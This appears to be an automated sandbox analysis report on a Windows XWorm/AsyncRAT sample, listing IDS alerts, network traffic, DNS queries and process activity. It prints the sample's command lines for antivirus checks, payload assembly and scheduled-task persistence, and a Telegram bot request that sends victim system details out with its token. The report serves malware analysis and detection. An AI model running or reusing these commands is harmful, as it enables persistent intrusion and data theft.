                                                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-10-29T14:17:48.652355+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.464427149.154.167.220443TCP
                                                                                                        2024-10-29T14:17:59.365704+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.464431193.41.226.2332222TCP
                                                                                                        2024-10-29T14:17:59.616383+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1193.41.226.2332222192.168.2.464431TCP
                                                                                                        2024-10-29T14:17:59.653552+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.464431193.41.226.2332222TCP
                                                                                                        2024-10-29T14:18:10.149694+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1193.41.226.2332222192.168.2.464431TCP
                                                                                                        2024-10-29T14:18:10.152577+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.464431193.41.226.2332222TCP
                                                                                                        2024-10-29T14:18:13.784635+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1193.41.226.2332222192.168.2.464431TCP
                                                                                                        2024-10-29T14:18:13.785604+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.464431193.41.226.2332222TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 29, 2024 14:17:46.877192020 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:46.877221107 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:46.877286911 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:46.885023117 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:46.885034084 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.159432888 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.159573078 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.161988974 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.161994934 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.162319899 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.207117081 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.226841927 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.271337032 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.652484894 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.652681112 CET44364427149.154.167.220192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.652905941 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.659080029 CET64427443192.168.2.4149.154.167.220
                                                                                                        Oct 29, 2024 14:17:48.776983976 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:17:48.782675982 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:17:48.782939911 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:17:48.846455097 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:17:48.852197886 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:17:59.365704060 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:17:59.371035099 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:17:59.616383076 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:17:59.653552055 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:17:59.658864021 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:09.895356894 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:18:09.902024984 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:10.149693966 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:10.152576923 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:18:10.158878088 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:13.535564899 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:18:13.540968895 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:13.784635067 CET222264431193.41.226.233192.168.2.4
                                                                                                        Oct 29, 2024 14:18:13.785604000 CET644312222192.168.2.4193.41.226.233
                                                                                                        Oct 29, 2024 14:18:13.790997028 CET222264431193.41.226.233192.168.2.4

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 29, 2024 14:16:11.459862947 CET5744653192.168.2.41.1.1.1
                                                                                                        Oct 29, 2024 14:16:11.499665976 CET53574461.1.1.1192.168.2.4
                                                                                                        Oct 29, 2024 14:16:47.512001038 CET5359869162.159.36.2192.168.2.4
                                                                                                        Oct 29, 2024 14:16:48.175642967 CET6484253192.168.2.41.1.1.1
                                                                                                        Oct 29, 2024 14:16:48.186403036 CET53648421.1.1.1192.168.2.4
                                                                                                        Oct 29, 2024 14:17:46.862706900 CET6225753192.168.2.41.1.1.1
                                                                                                        Oct 29, 2024 14:17:46.871174097 CET53622571.1.1.1192.168.2.4

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 29, 2024 14:16:11.459862947 CET192.168.2.41.1.1.10x992cStandard query (0)nAtuEYczbaU.nAtuEYczbaUA (IP address)IN (0x0001)false
                                                                                                        Oct 29, 2024 14:16:48.175642967 CET192.168.2.41.1.1.10x6ff0Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                        Oct 29, 2024 14:17:46.862706900 CET192.168.2.41.1.1.10x7cfeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 29, 2024 14:16:11.499665976 CET1.1.1.1192.168.2.40x992cName error (3)nAtuEYczbaU.nAtuEYczbaUnonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 29, 2024 14:16:48.186403036 CET1.1.1.1192.168.2.40x6ff0Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                        Oct 29, 2024 14:17:46.871174097 CET1.1.1.1192.168.2.40x7cfeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • api.telegram.org

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.464427149.154.167.2204433608C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-29 13:17:48 UTC446OUTGET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1
                                                                                                        Host: api.telegram.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-10-29 13:17:48 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Tue, 29 Oct 2024 13:17:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 434
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-10-29 13:17:48 UTC434INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 32 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 38 31 34 36 35 35 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 4e 43 4f 4d 49 4e 47 20 56 49 52 55 53 20 5c 75 64 38 33 65 5c 75 64 64 61 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6c 6c 79 73 77 69 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 39 35 32 31 33 30 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 67 61 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 30 37 38 36 38 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":10298,"from":{"id":7981465575,"is_bot":true,"first_name":"INCOMING VIRUS \ud83e\udda0","username":"Allyswixx_bot"},"chat":{"id":6795213026,"first_name":"Megan","type":"private"},"date":1730207868,"text":"\u2620 [XWorm V5.


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\DA92phBHUS.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:3'145'765 bytes
                                                                                                        MD5 hash:649673218A19E8FD278C99D1355949F4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /I "wrsa opssvc"
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c md 438799
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /V "pantyhoseyourslandscapesdisposition" Flyer
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:Dump.pif L
                                                                                                        Imagebase:0xe40000
                                                                                                        File size:893'608 bytes
                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 5%, ReversingLabs
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:choice /d y /t 15
                                                                                                        Imagebase:0x6e0000
                                                                                                        File size:28'160 bytes
                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:187'904 bytes
                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:15
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
                                                                                                        Imagebase:0x300000
                                                                                                        File size:187'904 bytes
                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:16
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:09:16:11
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
                                                                                                        Imagebase:0x7ff7fa660000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:09:16:12
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
                                                                                                        Imagebase:0x2f0000
                                                                                                        File size:893'608 bytes
                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 5%, ReversingLabs
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:23
                                                                                                        Start time:09:17:37
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
                                                                                                        Imagebase:0xc50000
                                                                                                        File size:65'440 bytes
                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:17.8%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:20.7%
                                                                                                          Total number of Nodes:1526
                                                                                                          Total number of Limit Nodes:33
